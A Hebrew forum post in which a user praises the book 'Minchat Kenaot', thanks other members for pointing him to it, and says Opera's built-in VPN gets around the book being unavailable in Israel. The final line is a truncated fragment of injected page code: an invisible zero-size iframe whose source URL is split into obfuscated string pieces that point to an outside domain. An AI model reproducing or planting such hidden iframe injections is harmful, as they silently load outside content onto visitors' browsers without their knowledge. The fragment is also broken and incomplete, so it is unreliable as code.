הספר הוא "מנחת קנאות". אי אפשר להורידו בישראל משום מה.
אם אתה רוצה להוריד אותו תתקין את הסייר OPERA ותפעיל את האופציה של VPN וכך תוכל לראות ברור את הספר.
אני שולח לך קישור לסייר OPERA.
אגב בספר הזה יש הרבה פרקים מעניינים שאם נקבל אותם אפשר לסגור את הפורום עצכ"ח , היות והמנחת קנאות שם מאריך בפרקים אחד לאחד נגד שיטת הפורם ומצאתי שם אסמכתא גדןלה לצורת החשיבה שלי הן בנושא האמונה והן בנושא יחוד השם שכידוע .
ר ישראל רובין ומיימוני
תודה לכם שעל ידי ר ישראל שהביא ציטוט מהספר ועל ידי מיימוני שהסתקרן למצוא את הספר זכיתי לראות את הספר הזה .
הוא מאוד מעניין אותי ואני צריך לקרוא אותו הרבה שם יש את דעת האמת לכל נושאי הפורום שברור שדעתו נגד צורת החשיבה של הפורום ונכתב בשפה פשוטה וברורה .
אני מודה לבורא עולם שזיכה אותי להגיע לספר הנ"ל דרך הפורם .
למי שיש מכשיר אנדרואיד יכול להכנס לאותו סייר ולראות שם הוראות איך לעיין בספר דרך המכשיר .
וזה מה שנאמר על רבי מאיר תוכו אכל קליפתו זרק .
יש שם עוד נושאים על הבנת התורה שבארץ ישראל שכמובן יש לשנות את שיטת הלימוד מהישיבות בחוץ לארץ כדי לקבל את השגת ארץ ישראל .
בקיצור הספר מתוק מדבש בשבילי .ושוב תודה לכל הגורמים שהביאו אותי לגלות את הספר.
ברור שדרך הקישור ששלחתי קל לקרוא את הטקסט.
אבל הרי הפורום הוא כדעת המו"נ לכן תשאיר את הפורום בשבילם אבל מי שדעתו כדעת הראשונים והקבלה אין לא מה לדון בפורום על דברים פשוטים .
היות ואחד מצצט מו"נ ואחד מצטט רשב"א .ומקובלים
scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");